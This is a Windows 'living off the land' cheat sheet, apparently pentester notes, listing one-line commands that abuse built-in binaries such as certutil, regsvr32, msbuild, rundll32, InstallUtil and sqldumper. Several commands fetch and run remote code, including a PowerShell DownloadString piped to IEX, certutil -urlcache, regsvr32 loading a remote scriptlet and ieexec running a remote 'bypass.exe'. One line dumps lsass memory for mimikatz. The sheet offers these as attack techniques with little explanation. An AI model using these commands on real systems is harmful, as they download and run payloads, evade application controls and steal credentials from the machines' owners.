Link to this headingNative Binary Tricks
Living Off The Land Binaries, Scripts and Libraries
Link to this headingforfiles
forfiles /p c:\\windows\\system32 /m notepad.exe /c calc.exe
Link to this headingbash.exe
bash.exe -c calc.exe
Link to this headingscriptrunner.exe
scriptrunner.exe -appvscript calc.exe
Link to this headingSyncAppvPublishingServer.exe
SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('[http://some.url/script.ps1'](http://some.url/script.ps1')) | IEX
Link to this headinghh.exe
hh.exe [http://www.google.com] or hh.exe c:\\
Link to this headingcertutil.exe
certutil -Class scrobj.dll
certutil -Class [http://WScript.Shell]
certutil -urlcache -split -f [http://example.com/file]
certutil.exe -URL will fetch ANY file and download it here: %userprofile%\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content
Link to this headingrundll32.exe
rundll32.exe javascript:"..\\mshtml,RunHTMLApplication ";document.write;new%20ActiveXObject.Run
Link to this headingregsvr32.exe
regsvr32 /s /n /u /i:[http://example.com/file.sct] scrobj.dll
Link to this headingmsbuild.exe
msbuild.exe pshell.xml
Link to this headingregsvcs.exe
regsvcs.exe /U regsvcs.dll regsvcs.exe regsvcs.dll
Link to this headingregasm.exe
regasm.exe /U regsvcs.dll regasm.exe regsvcs.dll
Link to this headingbginfo.exe
bginfo.exe bginfo.bgi /popup /nolicprompt
Link to this headingInstallUtil.exe
InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
Link to this headingieexec.exe
ieexec.exe [http://x.x.x.x:8080/bypass.exe]
Link to this headingmsxsl.exe
msxsl.exe customers.xml script.xsl
Link to this headingodbcconf.exe
odbcconf.exe /f my.rsp
Link to this headingsqldumper.exe
sqldumper.exe 464 0 0x0110:40 - Dump lsass to mimikatz comp. dump
sqldumper.exe 540 0 0x01100
https://twitter.com/countuponsec/status/910969424215232518
Link to this headingpcalua.exe
pcalua.exe-a c:\\datafolder\\tester.bat
pcalua.exe -a \\\\server\\payload.dll
pcalua.exe -a C:\\Windows\\system32\\javacpl.cpl -c Java